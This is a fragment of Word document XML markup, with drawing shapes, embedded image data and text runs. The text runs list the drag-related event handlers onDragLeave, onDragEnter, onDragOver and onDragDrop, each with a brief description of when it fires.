                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167"/>
                              <a:gd name="T46" fmla="+- 0 349 167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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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Text Box 107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11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onDragLeave()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0" o:spid="_x0000_s1362" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:58.35pt;height:9.15pt;z-index:-17629696;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167" coordsize="116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">
                <v:shape id="Freeform 1072" o:spid="_x0000_s1363" style="position:absolute;left:1930;top:167;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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SA7cYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74W+g9hCLqWRG0pb3CihDQQMpYf8PMBi&#10;bW0Ta2Uk2VbePnso9LbLzM58u95m16uJQuw8G3heFqCIa287bgycT/und1AxIVvsPZOBK0XYbu7v&#10;1lhaP/OBpmNqlIRwLNFAm9JQah3rlhzGpR+IRfv1wWGSNTTaBpwl3PV6VRSv2mHH0tDiQLuW6stx&#10;dAZ+dl+5wu85xFxN48v4eD7o68WYxUP+/ACVKKd/8991ZQW/eBN++UZG0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SA7cYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,349;21,349;18,349;0,328;0,325;0,188;21,167;1146,167;1167,188;1167,328;1149,349;1146,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1071" o:spid="_x0000_s1364" type="#_x0000_t202" style="position:absolute;left:1930;top:167;width:116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K3XsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYYTeNLEH265GkdKCUBDX7cHjuBl3&#10;g5vJdhN1/feNUPA2j/c582XvGnGhLljPGiZjBYK49MZypeGn+Bq9gQgR2WDjmTTcKMBy8TSYY2b8&#10;lXO67GIlUgiHDDXUMbaZlKGsyWEY+5Y4cUffOYwJdpU0HV5TuGvki1JT6dByaqixpY+aytPu7DSs&#10;9px/2t/NYZsfc1sU74q/pyetn4f9agYiUh8f4n/32qT56nUC92/SC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K3X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onDragLeave()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(requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>that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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>drags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>off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valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>location)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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:ind w:left="1673" w:hanging="148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729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741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1066" name="Group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6205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1067" name="Freeform 1069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1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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Text Box 106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11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onDragEnter()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7" o:spid="_x0000_s1365" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:58.35pt;height:9.15pt;z-index:-17629184;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="116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">
                <v:shape id="Freeform 1069" o:spid="_x0000_s1366" style="position:absolute;left:1930;top:154;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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SORMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP3WrCMBS+H+wdwhF2M2Y6ETeqUTZBKIgX/jzAoTlr&#10;i81JSdI2vv0iCN6dj+/3rDbRtGIg5xvLCj6nGQji0uqGKwWX8+7jG4QPyBpby6TgRh4269eXFeba&#10;jnyk4RQqkULY56igDqHLpfRlTQb91HbEifuzzmBI0FVSOxxTuGnlLMsW0mDDqaHGjrY1lddTbxQc&#10;tr+xwP3ofCyGft6/X47ydlXqbRJ/liACxfAUP9yFTvOzxRfcv0kn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SORMMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,336;21,336;18,336;0,315;0,312;0,175;21,154;1146,154;1167,175;1167,315;1149,336;1146,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1068" o:spid="_x0000_s1367" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:116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GIHsYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUvDQBCF74L/YRnBm92th6Cx21JKhYIgpvHgccxO&#10;k6XZ2TS7beO/dw6Ctxnem/e+Waym0KsLjclHtjCfGVDETXSeWwuf9evDE6iUkR32kcnCDyVYLW9v&#10;Fli6eOWKLvvcKgnhVKKFLueh1Do1HQVMszgQi3aIY8As69hqN+JVwkOvH40pdEDP0tDhQJuOmuP+&#10;HCysv7ja+tP790d1qHxdPxt+K47W3t9N6xdQmab8b/673jnBN4Xgyj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GIHs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onDragEnter()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(requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>drags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>location)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589"/>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1589" w:hanging="1400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780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687070" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1063" name="Group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070" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1064" name="Freeform 1066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1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082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2" h="183">
                                <a:moveTo>
                                  <a:pt x="106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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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Text Box 106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108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onDragOver()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4" o:spid="_x0000_s1368" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:54.1pt;height:9.15pt;z-index:-17628672;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="108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">
                <v:shape id="Freeform 1066" o:spid="_x0000_s1369" style="position:absolute;left:1930;top:166;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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NDV8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQRvNdsqsmyNUgVLoR5a9eJt2Mxu&#10;lm4mSxLXbX+9EQq9zeN9znI92Fb05EPjWMHTNANBXDrdcK3gdNw95iBCRNbYOiYFPxRgvRo9LLHQ&#10;7spf1B9iLVIIhwIVmBi7QspQGrIYpq4jTlzlvMWYoK+l9nhN4baVz1m2kBYbTg0GO9oaKr8PF6ug&#10;tm8bu/uocrM/of+9fPb57FwpNRkPry8gIg3xX/znftdpfraYw/2bdIJ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TQ1fEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1061,182l21,182r-3,l,161r,-3l,21,21,,1061,r21,21l1082,161r-18,21l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,348;21,348;18,348;0,327;0,324;0,187;21,166;1061,166;1082,187;1082,327;1064,348;1061,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1065" o:spid="_x0000_s1370" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:108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AngMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H+x/CCfsbSYOVlw1iowNhIFYu4c9ns3Z&#10;BptL10Tt/nsjCHu7j+/nzZeDa8WZ+mA9a5iMFQjiyhvLtYbv8vN5CiJEZIOtZ9LwRwGWi8eHOebG&#10;X7ig8y7WIoVwyFFDE2OXSxmqhhyGse+IE3fwvcOYYF9L0+MlhbtWviiVSYeWU0ODHb03VB13J6dh&#10;9cPFh/3d7LfFobBl+ab4Kztq/TQaVjMQkYb4L7671ybNV9kr3L5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AngM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onDragOver()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(requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>drags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>location)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589"/>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1589" w:hanging="1400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832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687070" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1060" name="Group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070" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1061" name="Freeform 1063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1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082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2" h="183">
                                <a:moveTo>
                                  <a:pt x="106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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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Text Box 106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108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onDragDrop()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1" o:spid="_x0000_s1371" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:54.1pt;height:9.15pt;z-index:-17628160;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="108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">
                <v:shape id="Freeform 1063" o:spid="_x0000_s1372" style="position:absolute;left:1930;top:166;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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Tgz8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/6HMEJvmtWCLFujtIIitIdWvXgbNrOb&#10;pZvJksR16683hUJv83ifs9oMthU9+dA4VjCfZSCIS6cbrhWcT7tpDiJEZI2tY1LwQwE26/FohYV2&#10;N/6i/hhrkUI4FKjAxNgVUobSkMUwcx1x4irnLcYEfS21x1sKt61cZNlSWmw4NRjsaGuo/D5erYLa&#10;7t/s7r3KzccZ/f362efPl0qpp8nw+gIi0hD/xX/ug07zs+Ucfr9JJ8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+Tgz8MAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1061,182l21,182r-3,l,161r,-3l,21,21,,1061,r21,21l1082,161r-18,21l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,348;21,348;18,348;0,327;0,324;0,187;21,166;1061,166;1082,187;1082,327;1064,348;1061,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1062" o:spid="_x0000_s1373" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:108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m/9MMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTeaqKHpV2NImKhUChdt4cex824&#10;G9xM1k2q6783gtDbPN7nLFaDa8WZ+mA9a5hOFAjiyhvLtYaf8v3lFUSIyAZbz6ThSgFWy9HTAnPj&#10;L1zQeRdrkUI45KihibHLpQxVQw7DxHfEiTv43mFMsK+l6fGSwl0rZ0pl0qHl1NBgR5uGquPuz2lY&#10;/3Kxtaev/XdxKGxZvin+zI5aP4+H9RxEpCH+ix/uD5Pmq2wG92/SC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m/9M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onDragDrop()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8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>drops</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
